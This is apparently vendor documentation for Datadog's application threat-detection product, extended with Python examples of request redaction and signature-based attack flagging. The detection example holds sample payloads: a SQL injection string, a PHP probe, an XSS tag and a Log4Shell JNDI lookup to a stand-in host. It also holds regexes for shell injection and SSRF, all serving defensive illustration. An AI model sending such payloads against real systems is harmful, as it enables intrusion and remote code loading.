
Overview

Datadog App and API Protection provides observability into application-level attacks that aim to exploit code-level vulnerabilities or abuse the business logic of your application, and into any bad actors targeting your systems. It provides:

  • Observability into attacks: Provides insight into application-level attacks targeting code vulnerabilities or business logic.
  • Trace-based monitoring: Utilizes the same tracing libraries as Datadog APM to monitor traffic and detect security threats.
  • Security signals: Automatically generates security signals when attacks or business logic abuses are detected, focusing on meaningful threats rather than individual attempts.
  • Notification options: Offers notifications through Slack, email, or PagerDuty based on security signal settings.
  • Embedded security: Integrated within the application, providing better threat identification and classification by accessing trace data.
  • Enhanced WAF functionality: Functions like a Web Application Firewall (WAF) but with additional application context, improving accuracy and reducing false positives.

Identify services exposed to application attacks

Datadog App and API Protection Threat Management uses the information APM is already collecting to flag traces containing attack attempts. While APM collects a sample of your application traffic, enabling App and API Protection in the tracing library is necessary to effectively monitor and protect your services.

Services exposed to application attacks are highlighted directly in the security views embedded in APM (Software Catalog, Service Page, Traces).

Datadog Threat Monitoring and Detection identifies bad actors by collecting client IP addresses, login account info (for example, user account/ID), and manually-added user tags on all requests.

1-Click Enablement
If your service is running with an Agent with Remote Configuration enabled and a tracing library version that supports it, you can enable App and API Protection from the Datadog UI without additional configuration of the Agent or tracing libraries.

Compatibility

For Datadog App and API Protection to be compatible with your Datadog configuration, you must have APM enabled and sending traces to Datadog. App and API Protection uses the same libraries used by APM, so you don’t need to deploy and maintain another library.

Steps to enable Datadog App and API Protection are specific to each runtime language. Check whether your language is supported in the App and API Protection prerequisites for each product.

Serverless monitoring

Datadog App and API Protection for AWS Lambda provides deep visibility into attackers targeting your functions. With distributed tracing providing a context-rich picture of the attack, you can assess the impact and remediate the threat effectively.

Read Enabling App and API Protection for Serverless for information on setting it up.

Performance

Datadog App and API Protection uses processes already contained in the Agent and APM, so there are negligible performance implications when using it.

When APM is enabled, the Datadog library generates distributed traces. Datadog App and API Protection flags security activity in traces by using known attack patterns. Correlation between the attack patterns and the execution context provided by the distributed trace triggers security signals based on detection rules.

A diagram illustrates that the Datadog tracer library operates at the application service level and sends traces to the Datadog backend. The Datadog backend flags actionable security signals and sends a notification to the relevant application, such as PagerDuty, Jira or Slack.

Data sampling and retention

In the tracing library, Datadog App and API Protection collects all traces that include security data. A default retention filter ensures the retention of all security-related traces in the Datadog platform.

Data for security traces is kept for 90 days. The underlying trace data is kept for 15 days.

Data privacy

By default, App and API Protection collects information from security traces to help you understand why the request was flagged as suspicious. Before sending the data, App and API Protection scans it for patterns and keywords that indicate that the data is sensitive. If the data is deemed sensitive, it is replaced with a <redacted> flag. This indicates that the request was suspicious, but that the request data could not be collected because of data security concerns.

Here are some examples of data that is flagged as sensitive by default:

  • pwd, password, ipassword, pass_phrase
  • secret
  • key, api_key, private_key, public_key
  • token
  • consumer_id, consumer_key, consumer_secret
  • sign, signed, signature
  • bearer
  • authorization
  • BEGIN PRIVATE KEY
  • ssh-rsa

To configure the information redacted by App and API Protection, refer to the data security configuration.
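The redaction step described above, as an added example that is not Datadog's tracer code: a scanner that walks a captured request (headers, query parameters, body), checks each key against the keyword list from this section and each string value against the value patterns (`BEGIN PRIVATE KEY`, `ssh-rsa`, bearer credentials), and replaces matches with the `<redacted>` flag. The boundary-aware keyword matching, the field layout of the request, and the sample request itself are constructed for this example; the real tracer's matching rules are configurable and are not reproduced here.

```python
import re

REDACTED = "<redacted>"

# Keywords the page lists as sensitive by default. A key is sensitive when one of
# these appears in it as a whole word, so "X-Api-Key" and "pass_phrase" match
# but "keyboard" and "design" do not. (Example matching rule, not Datadog's.)
_SENSITIVE_KEYWORDS = [
    "pwd", "password", "ipassword", "pass_phrase", "secret", "key", "api_key",
    "private_key", "public_key", "token", "consumer_id", "consumer_key",
    "consumer_secret", "sign", "signed", "signature", "bearer", "authorization",
]
SENSITIVE_KEY_RE = re.compile(
    r"(?i)(?<![a-z0-9])(?:" + "|".join(map(re.escape, _SENSITIVE_KEYWORDS)) + r")(?![a-z0-9])"
)

# Value-level patterns: PEM private key material, SSH public keys and bearer
# credentials are redacted regardless of the key they travel under.
SENSITIVE_VALUE_RE = re.compile(r"(?i)BEGIN PRIVATE KEY|ssh-rsa\s+\S+|\bbearer\s+\S+")


def is_sensitive_key(name):
    """True when a header, parameter or field name carries a sensitive keyword."""
    return SENSITIVE_KEY_RE.search(name) is not None


def _redact(value):
    """Recursively redact dicts, lists and strings; other scalars pass through."""
    if isinstance(value, dict):
        return {
            k: (REDACTED if is_sensitive_key(k) else _redact(v))
            for k, v in value.items()
        }
    if isinstance(value, list):
        return [_redact(v) for v in value]
    if isinstance(value, str) and SENSITIVE_VALUE_RE.search(value):
        return REDACTED
    return value


def redact_request(request):
    """Return a redacted copy of a captured request; the input is not modified.
    Non-sensitive data, including the suspicious payload that caused the
    request to be flagged, is kept so the analyst can still see why."""
    return _redact(request)


# Constructed sample request; all values are placeholders, not real credentials.
SAMPLE_REQUEST = {
    "headers": {
        "Host": "shop.example.test",
        "Authorization": "Bearer eyJhbGciOi.constructed.token",
        "X-Api-Key": "constructed-example-key",
        "User-Agent": "curl/8.0",
    },
    "query": {"user": "alice", "pwd": "hunter2"},
    "body": {
        "note": "-----BEGIN PRIVATE KEY-----\nMIIEv...constructed...",
        "comment": "' OR 1=1 --",
    },
}

if __name__ == "__main__":
    import json
    print(json.dumps(redact_request(SAMPLE_REQUEST), indent=2))
```

Keys are tested before values, so a sensitive key is redacted even when its value looks harmless, while the `comment` field above survives untouched because neither its name nor its content matches: the flagged payload stays visible to the investigator, which is the behaviour the section describes.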

Threat detection methods

Datadog uses multiple pattern sources, including the OWASP ModSecurity Core Rule Set to detect known threats and vulnerabilities in HTTP requests. When an HTTP request matches one of the OOTB detection rules, a security signal is generated in Datadog.

Automatic threat pattern updates: If your service is running with an Agent with Remote Configuration enabled and a tracing library version that supports it, the threat patterns used to monitor your service are automatically updated whenever Datadog publishes updates.

Security Signals are automatically created when Datadog detects meaningful attacks targeting your production services. They give you visibility into the attackers and the targeted services. You can set custom detection rules with thresholds to determine which attacks you want to be notified about.

Built-in protection

For services running with an Agent that has Remote Configuration enabled and a tracing library version that supports it, you can block attacks and attackers from the Datadog UI without additional configuration of the Agent or tracing libraries.

ASM Protect goes beyond Threat Detection and enables blocking actions that slow down attacks and attackers. Unlike a perimeter WAF, which inspects traffic by applying a broad set of rules, ASM uses the full context of your application (its databases, frameworks, and programming language) to narrow down and apply the most efficient set of inspection rules.

ASM uses the same tracing libraries as Application Performance Monitoring (APM) to protect your application against threats such as:

  • Attacks: The ASM In-App WAF inspects all incoming traffic and uses pattern matching to detect and block malicious traffic (security traces).
  • Attackers: IP addresses and authenticated users that are launching attacks against your application are detected from the insights collected by the library and flagged in security signals.

Security traces are blocked in real time by the Datadog tracing libraries. Blocks are saved in Datadog, automatically and securely fetched by the Datadog Agent, deployed to your infrastructure, and applied to your services. For details, see How Remote Configuration works.

To get started with Protection features such as the In-App WAF, IP blocking, and user blocking, read Protection.

Attack attempt qualification

Leveraging distributed tracing information, attack attempts are qualified as safe, unknown, or harmful.

  • Attack attempts qualified as safe cannot breach your application, for example, when a PHP injection attack targets a service written in Java.
  • An unknown qualification is decided when there is not enough information to make a definitive judgement about the attack’s probability of success.
  • A harmful qualification is highlighted when there is evidence that a code-level vulnerability has been found by the attacker.

Threat monitoring coverage

Datadog App and API Protection includes over 100 attack signatures that help protect against many different kinds of attacks, including, but not limited to, the following categories:

  • SQL injections
  • Code injections
  • Shell injections
  • NoSQL injections
  • Cross-Site Scripting (XSS)
  • Server-side Request Forgery (SSRF)
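The pipeline described in "Threat detection methods", "Attack attempt qualification" and the category list above, as an added example that is not Datadog's or the OWASP Core Rule Set's code: one deliberately simplified signature per listed category (plus a Log4Shell indicator), a per-trace matcher that qualifies each hit as safe or unknown from the service's runtime, and a threshold rule that turns repeated non-safe attempts from one client IP against one service into a security signal rather than alerting on every attempt. The signatures, the trace field names (`url`, `user_agent`, `body`, `language`), the rule that safe attempts do not count toward the threshold, and the sample traces are all constructed for this example.

```python
import re
from collections import defaultdict

# Constructed, simplified signatures; they stand in for the CRS-derived rules
# the page mentions and are NOT the real rule set. "targets" records which
# runtime a payload can actually affect (None = any runtime) and drives the
# safe/unknown qualification below.
SIGNATURES = {
    "sql_injection":   {"pattern": re.compile(r"(?i)'\s*or\s*'?\d+'?\s*=\s*'?\d+|union\s+select"), "targets": None},
    "php_injection":   {"pattern": re.compile(r"(?i)<\?php|\bphpinfo\s*\("), "targets": {"php"}},
    "shell_injection": {"pattern": re.compile(r"(?:;|\|\||&&)\s*(?:id|whoami|cat)\b"), "targets": None},
    "nosql_injection": {"pattern": re.compile(r"\$(?:ne|gt|where)\b"), "targets": None},
    "xss":             {"pattern": re.compile(r"(?i)<script\b|javascript:"), "targets": None},
    "ssrf":            {"pattern": re.compile(r"(?i)https?://(?:127\.0\.0\.1|localhost|169\.254\.169\.254)\b"), "targets": None},
    "log4shell":       {"pattern": re.compile(r"\$\{jndi:"), "targets": {"java"}},
}

# Request fields of a trace that the matcher inspects (assumed layout).
REQUEST_FIELDS = ("url", "user_agent", "body")


def flag_trace(trace):
    """Return one finding per matching signature. A finding is 'safe' when the
    payload targets a runtime this service does not use (the page's PHP
    injection against a Java service), otherwise 'unknown'. 'harmful' needs
    evidence that the vulnerability was actually reached, which a request
    alone does not carry, so this matcher never produces it."""
    haystack = " ".join(str(trace.get(field, "")) for field in REQUEST_FIELDS)
    findings = []
    for category, sig in SIGNATURES.items():
        if not sig["pattern"].search(haystack):
            continue
        targets = sig["targets"]
        qualification = "safe" if targets is not None and trace.get("language") not in targets else "unknown"
        findings.append({"trace_id": trace["id"], "category": category, "qualification": qualification})
    return findings


def generate_signals(traces, threshold=2):
    """Aggregate non-safe attempts per (client IP, service) and emit one signal
    per source that reaches the threshold. The threshold is this example's
    stand-in for a custom detection rule; safe attempts are excluded by
    assumption so that unexploitable noise does not page anyone."""
    attempts = defaultdict(list)
    for trace in traces:
        for finding in flag_trace(trace):
            if finding["qualification"] != "safe":
                attempts[(trace["client_ip"], trace["service"])].append(finding)
    signals = []
    for (client_ip, service), findings in attempts.items():
        if len(findings) >= threshold:
            signals.append({
                "client_ip": client_ip,
                "service": service,
                "attempts": len(findings),
                "categories": sorted({f["category"] for f in findings}),
            })
    return signals


# Constructed sample traces (URLs shown already decoded). Addresses are from
# documentation ranges; the payloads are the textbook strings the signatures
# above are written to catch.
SAMPLE_TRACES = [
    {"id": 1, "client_ip": "203.0.113.7", "service": "shop-api", "language": "java", "url": "/search?q=shoes"},
    {"id": 2, "client_ip": "203.0.113.7", "service": "shop-api", "language": "java", "url": "/search?q=' OR '1'='1"},
    {"id": 3, "client_ip": "203.0.113.7", "service": "shop-api", "language": "java", "url": "/search?q=<?php phpinfo(); ?>"},
    {"id": 4, "client_ip": "203.0.113.7", "service": "shop-api", "language": "java", "url": "/login",
     "user_agent": "${jndi:ldap://constructed.example/x}"},
    {"id": 5, "client_ip": "198.51.100.4", "service": "shop-api", "language": "java", "url": "/search?q=<script>alert(1)</script>"},
    {"id": 6, "client_ip": "198.51.100.4", "service": "shop-api", "language": "java", "url": "/cart"},
]

if __name__ == "__main__":
    for trace in SAMPLE_TRACES:
        print(trace["id"], flag_trace(trace))
    print(generate_signals(SAMPLE_TRACES))
```

With the default threshold of 2, only `203.0.113.7` produces a signal: its SQL injection and Log4Shell attempts count, while the PHP payload against a Java service is recorded as safe and ignored. The single XSS attempt from `198.51.100.4` is flagged on its trace but never becomes a signal, which is the "meaningful threats rather than individual attempts" behaviour the overview describes.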

API security

API security is in Preview.

Datadog App and API Protection provides visibility into threats targeting your APIs. Use the Endpoints list in Software Catalog to monitor API health and performance metrics, where you can view attacks targeting your APIs. This view includes the attacker’s IP and authentication information, as well as request headers showing details about how the attack was formed. Using both App and API Protection and API management, you can maintain a comprehensive view of your API attack surface, and respond to mitigate threats.

How Datadog App and API Protection protects against Log4Shell

Datadog App and API Protection identifies Log4j Log4Shell attack payloads and provides visibility into vulnerable apps that attempt to remotely load malicious code. When used in tandem with the rest of Datadog’s Cloud SIEM, you can investigate to identify common post-exploitation activity, and proactively remediate potentially vulnerable Java web services acting as an attack vector.